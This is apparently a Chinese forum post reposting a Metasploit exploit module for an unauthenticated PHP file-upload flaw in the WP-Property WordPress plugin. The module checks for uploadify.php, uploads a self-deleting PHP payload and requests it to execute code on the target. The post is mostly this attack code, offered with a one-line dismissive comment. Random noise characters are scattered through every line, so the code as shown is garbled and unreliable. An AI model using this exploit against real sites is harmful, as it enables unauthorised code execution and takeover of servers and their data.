WordPress WP-Property PHP 文件上传漏洞
! S e5 ]% B* L: p* G: `) N, E6 H6 T1 N2 _) b
## # This file is part of the Metasploit Framework and may be subject to, @8 k- ~- K o1 u1 c7 R5 j; e
$ b/ t; s% n; M7 u2 w
# redistribution and commercial restrictions. Please see the Metasploit
[, G) |- r5 O- r6 S- E
' o# Y. m) J0 w) V; m( R# Framework web site for more information on licensing and terms of use.4 U% e; U3 l! v2 x
1 @( h5 q) i0 o' g1 Y2 B
# http://metasploit.com/framework/ ##
+ u9 v$ a, s3 O- F8 q* e) I! `# h0 x. S$ P- W" L5 V7 H
* s5 |1 x5 m9 N# s
% a$ G" j. `: o _$ u1 m$ E
% U6 Y- u/ L+ G x8 C! d. R
' G9 s7 z; o B) t8 P
require 'msf/core', ] `1 E) z+ V+ |, j
require 'msf/core/exploit/php_exe'
* Y0 r; {; Y/ j+ Y9 H+ @' B( Z
, n) [* L I0 S _) T1 [class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit: hpEXE def initialize(info = {}) super(update_info(info, 'Name' => 'WordPress WP-Property PHP File Upload Vulnerability',
" N; H. v* |' q3 t( y'Description' => %q{
, W( c# d* [/ I$ f7 [- H9 wThis module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress plugin. By abusing the uploadify.php file, a malicious user can upload a file to a temp directory without authentication, which results in arbitrary code execution. }, 'Author' =>1 q$ i3 b& ]# l
[
! G$ x) C, c" K* C'Sammy FORGIT', # initial discovery2 F; h& R, f& m/ k) k( e
'James Fitts <fitts.james[at]gmail.com>' # metasploit module' @1 e1 M5 _% q- t
],( H( g9 i2 B6 D% r
'License' => MSF_LICENSE,( R c; z' ^6 O) v
'References' =>9 U. k- J& y5 b6 b# E
[
_; v# y/ E' e- `5 ]' K[ 'OSVDB', '82656' ],
( W' k7 y, l$ L[ 'BID', '53787' ],
+ ?+ I' A$ N* B( s[ 'EDB', '18987'],
& E. ^- A O q, c" P[ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]
3 Y6 y: ]: Q) k- a; b) Q],7 a8 b. C n5 j1 \
'Payload' =>8 f5 P3 }) A9 f1 V/ w2 }
{
) w3 R- I- t; t'BadChars' => "\x00",
0 z _! k9 W* S},% u1 M. W! R7 b% e1 Z! s
'Platform' => 'php',4 [2 M0 S1 `( g6 h, _
'Arch' => ARCH_PHP, |+ q7 w# f9 }& {/ t
'Targets' =>0 d; X5 G+ |0 o5 f) X
[
) l& G' M6 h% A3 C; F4 p7 @+ P[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
2 S9 `% w6 [/ N1 u, n[ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
7 `( j& V4 q( F: N A" b z0 W) a],, z3 d, l) `. h" [+ W
'DefaultTarget' => 0,; E: z# q$ l& r* @; a
'DisclosureDate' => 'Mar 26 2012'))
: g. L" W% n& |0 ^: i" y' {1 f: {: J. d6 h( `1 W4 o. e( I
register_options(
: u+ u# j _, }3 L[
' E& r |: b2 _) u2 e6 S8 tOptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])- F+ r. Z6 N0 F& B
], self.class)
$ i+ {5 T5 W/ A+ W o5 cend
$ @: d, B8 ~; D- e
1 N8 I* A& R' M4 I9 _. {6 d0 Ddef check, D- l0 q# C& P
uri = target_uri.path3 D6 o) t# ~0 C' ]& J
uri << '/' if uri[-1,1] != '/' res = send_request_cgi({ 'method' => 'GET',
+ C$ c j+ N3 G- M& ?'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"
3 y0 B% H4 Q9 S& j4 ~, U})5 m, L4 S" _6 z6 H
+ a# [8 q$ [9 {! E' L8 `
if not res or res.code != 200/ S1 t8 O* z d u9 U( y
return Exploit::CheckCode::Unknown
5 w7 q' _0 x* _$ ]end
9 Q6 I6 r5 ?& E" b) ]- T. p) q9 _/ x! a! i& c1 E: r
return Exploit::CheckCode::Appears# l2 O5 s+ p' Z7 d
end( Z( p/ L% a1 i8 v: e8 E+ s; _
: ^: n5 y2 X7 [! h
def exploit& @; E2 ~8 r4 s6 `5 ]( L7 q6 R( r
uri = target_uri.path2 C- v: C7 q1 }- e E* T0 q: ]
uri << '/' if uri[-1,1] != '/' peer = "#{rhost}:#{rport}" @payload_name = "#{rand_text_alpha(5)}.php" php_payload = get_write_exec_payload(:unlink_self=>true)
& P" G) G: ?# o1 _1 d1 T9 `
* }; n9 U1 x o+ G4 }data = Rex::MIME::Message.new
4 m8 z5 m7 f L' r/ w0 J8 ^# Zdata.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
' |: }2 p# \' Qdata.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")
# c: n: n1 d9 e" C# i# Qpost_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
0 t* k3 {3 R0 K
! S) ~6 T2 \8 aprint_status("#{peer} - Uploading payload #{@payload_name}")5 o: ^- R9 d6 K
res = send_request_cgi({
( f& h( x: O) ~$ J: n! G2 x'method' => 'POST',
: e- x* s/ l* T2 i& P8 i9 ]' U! p'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",
; `, `1 q) h6 m `; j8 H'ctype' => "multipart/form-data; boundary=#{data.bound}",
5 d2 u) A( \5 m) F; V0 L: G'data' => post_data
, }; y; Q! V, d Y& A! b0 M})% A' q2 i# ~( f" K; ^4 S
8 T2 n; g5 o: b* M* hif not res or res.code != 200 or res.body !~ /#{@payload_name}/
) i$ c; l9 }- ?4 mfail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed"): s3 `- `4 ?- ^& ^
end
6 D+ ]0 K; O! A v. W( Z. @: N6 T+ q9 f. A; R: O" s0 z( O, e e* f
upload_uri = res.body
6 l! l; K6 A3 g# ~) {& p9 v
9 M7 O K, }1 ]% d& X6 |; L) ~) Nprint_status("#{peer} - Executing payload #{@payload_name}")- F0 E) l* C" d: h( V/ d
res = send_request_raw({
+ R& Y" h/ _+ y6 z'uri' => upload_uri,
5 O7 G. n2 D- u8 ]'method' => 'GET'* \! C* Q: Y9 G" r8 a
})
) r; ]' Q& {+ p9 Q. vend
# \& y E6 h$ y8 G3 tend. b6 k, W3 j; X/ b0 a
' I' l. C3 i# r/ a不要问我这写的是什么 怎么利用 我是说msf.
, d: u5 U; A2 U5 _( R6 w) }
/ l: h g. h* r5 Q( Y. W |
发表于 2013-1-4 19:51:30
收藏
支持
反对